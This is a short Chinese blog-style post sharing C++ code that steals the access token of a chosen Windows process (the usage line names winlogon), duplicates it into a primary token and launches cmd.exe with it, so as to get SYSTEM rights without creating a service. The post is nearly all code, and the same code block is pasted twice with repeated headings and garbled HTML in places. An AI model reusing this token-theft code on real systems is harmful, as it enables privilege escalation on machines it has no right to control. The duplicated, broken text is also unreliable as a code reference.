有点想知道怎么不通过创建服务的方式来用SYSTEM权限运行指定的进程,我很好奇。网上搜了搜,分析了一下别人写的,学习了一哈
1.获取指定进程的令牌句柄
2.通过令牌句柄创建主令牌
2.通过创建的令牌执行新的Process
head.h
<span>#<span>pragma</span> once</span><br><span>#<span>include</span> <span>"iostream"</span></span><br><span>#<span>include</span> <span>"string"</span></span><br><span>#<span>include</span> <span>"Windows.h"</span></span><br><span>using</span> <span>namespace</span>::<span>std</span>;<br>
main.cpp
<span>#<span>include</span> <span>"stdafx.h"</span></span><br><span>#<span>include</span> <span>"head.h"</span></span><br><span><span>class</span> <span>Jack</span><br>{</span><br><span>public</span>:<br> <span>HANDLE <span>GetAccessToken</span><span>(DWORD pid)</span> </span>{<br> HANDLE currentProcess = {};<br> HANDLE Asstoken = {};<br> DWORD LastError;<br> currentProcess = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, pid);<br> <span>if</span> (!currentProcess) {<br> LastError = GetLastError();<br> <span>cout</span> << <span>"ERROR:OpenProcess(): "</span> << LastError << <span>endl</span>;<br> <span>return</span> (HANDLE)<span>NULL</span>;<br> }<br> <span>if</span> (!OpenProcessToken(currentProcess, TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY, &Asstoken)) {<br> LastError = GetLastError();<br> <span>cout</span> << <span>"ERROR:OpenProcessToken(): "</span> << LastError << <span>endl</span>;<br> <span>return</span> (HANDLE)<span>NULL</span>;<br> }<br> <span>return</span> Asstoken;<br> }<br> <span><span>void</span> <span>Runprocess</span><span>(HANDLE Token)</span> </span>{<br> DWORD LastError;<br> <span>if</span> (!DuplicateTokenEx(Token, MAXIMUM_ALLOWED, <span>NULL</span>, SecurityImpersonation, TokenPrimary, &Token)) {<br> LastError = GetLastError();<br> <span>cout</span> << <span>"ERROR
uplicateTokenEx(): "</span> << LastError << <span>endl</span>;<br> }<br> STARTUPINFOW si = {};<br> PROCESS_INFORMATION pi = {};<br> BOOL ret;<br> ret = CreateProcessWithTokenW(Token, LOGON_NETCREDENTIALS_ONLY, <span>L"C:\\Windows\\System32\\cmd.exe"</span>, <span>NULL</span>, CREATE_NEW_CONSOLE, <span>NULL</span>, <span>NULL</span>, &si, &pi);<br> <span>if</span> (!ret) {<br> LastError = GetLastError();<br> <span>cout</span> << <span>"ERROR:CreateProcessWithTokenW(): "</span> << LastError << <span>endl</span>;<br> }<br> }<br>};<br><span>//wmain()或main()还是其他main函数。第二个参数里有两个的代表是转成十六进制,一个的则是正常值。</span><br><span><span>int</span> <span>wmain</span><span>(<span>int</span> argc,WCHAR **argv)</span> </span>{ <span>//wmain()是UNICODE版本的main(), _tmain()是个宏,如果是UNICODE则它是wmain()</span><br> <span>if</span> (argc < <span>2</span>)<br> {<br> <span>cout</span> << <span>"Usage winlogon <Pid>"</span> << <span>endl</span>;<br> <span>return</span> <span>1</span>;<br> }<br> DWORD pid;<br> pid = _wtoi(argv[<span>1</span>]); <span>//十六进制转整</span><br> <span>cout</span> << <span>"[+] PID: "</span> << pid << <span>endl</span>;<br> Jack jk;<br> HANDLE Ptoken=jk.GetAccessToken(pid);<br> jk.Runprocess(Ptoken);<br> <span>return</span> <span>0</span>;<br>}<br>
以Administrator权限运行cmd
1.获取指定进程的令牌句柄
2.通过令牌句柄创建主令牌
2.通过创建的令牌执行新的Process
head.h
<span>#<span>pragma</span> once</span><br><span>#<span>include</span> <span>"iostream"</span></span><br><span>#<span>include</span> <span>"string"</span></span><br><span>#<span>include</span> <span>"Windows.h"</span></span><br><span>using</span> <span>namespace</span>::<span>std</span>;<br>
main.cpp
<span>#<span>include</span> <span>"stdafx.h"</span></span><br><span>#<span>include</span> <span>"head.h"</span></span><br><span><span>class</span> <span>Jack</span><br>{</span><br><span>public</span>:<br> <span>HANDLE <span>GetAccessToken</span><span>(DWORD pid)</span> </span>{<br> HANDLE currentProcess = {};<br> HANDLE Asstoken = {};<br> DWORD LastError;<br> currentProcess = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, pid);<br> <span>if</span> (!currentProcess) {<br> LastError = GetLastError();<br> <span>cout</span> << <span>"ERROR:OpenProcess(): "</span> << LastError << <span>endl</span>;<br> <span>return</span> (HANDLE)<span>NULL</span>;<br> }<br> <span>if</span> (!OpenProcessToken(currentProcess, TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY, &Asstoken)) {<br> LastError = GetLastError();<br> <span>cout</span> << <span>"ERROR:OpenProcessToken(): "</span> << LastError << <span>endl</span>;<br> <span>return</span> (HANDLE)<span>NULL</span>;<br> }<br> <span>return</span> Asstoken;<br> }<br> <span><span>void</span> <span>Runprocess</span><span>(HANDLE Token)</span> </span>{<br> DWORD LastError;<br> <span>if</span> (!DuplicateTokenEx(Token, MAXIMUM_ALLOWED, <span>NULL</span>, SecurityImpersonation, TokenPrimary, &Token)) {<br> LastError = GetLastError();<br> <span>cout</span> << <span>"ERROR
uplicateTokenEx(): "</span> << LastError << <span>endl</span>;<br> }<br> STARTUPINFOW si = {};<br> PROCESS_INFORMATION pi = {};<br> BOOL ret;<br> ret = CreateProcessWithTokenW(Token, LOGON_NETCREDENTIALS_ONLY, <span>L"C:\\Windows\\System32\\cmd.exe"</span>, <span>NULL</span>, CREATE_NEW_CONSOLE, <span>NULL</span>, <span>NULL</span>, &si, &pi);<br> <span>if</span> (!ret) {<br> LastError = GetLastError();<br> <span>cout</span> << <span>"ERROR:CreateProcessWithTokenW(): "</span> << LastError << <span>endl</span>;<br> }<br> }<br>};<br><span>//wmain()或main()还是其他main函数。第二个参数里有两个的代表是转成十六进制,一个的则是正常值。</span><br><span><span>int</span> <span>wmain</span><span>(<span>int</span> argc,WCHAR **argv)</span> </span>{ <span>//wmain()是UNICODE版本的main(), _tmain()是个宏,如果是UNICODE则它是wmain()</span><br> <span>if</span> (argc < <span>2</span>)<br> {<br> <span>cout</span> << <span>"Usage winlogon <Pid>"</span> << <span>endl</span>;<br> <span>return</span> <span>1</span>;<br> }<br> DWORD pid;<br> pid = _wtoi(argv[<span>1</span>]); <span>//十六进制转整</span><br> <span>cout</span> << <span>"[+] PID: "</span> << pid << <span>endl</span>;<br> Jack jk;<br> HANDLE Ptoken=jk.GetAccessToken(pid);<br> jk.Runprocess(Ptoken);<br> <span>return</span> <span>0</span>;<br>}<br>以Administrator权限运行cmd
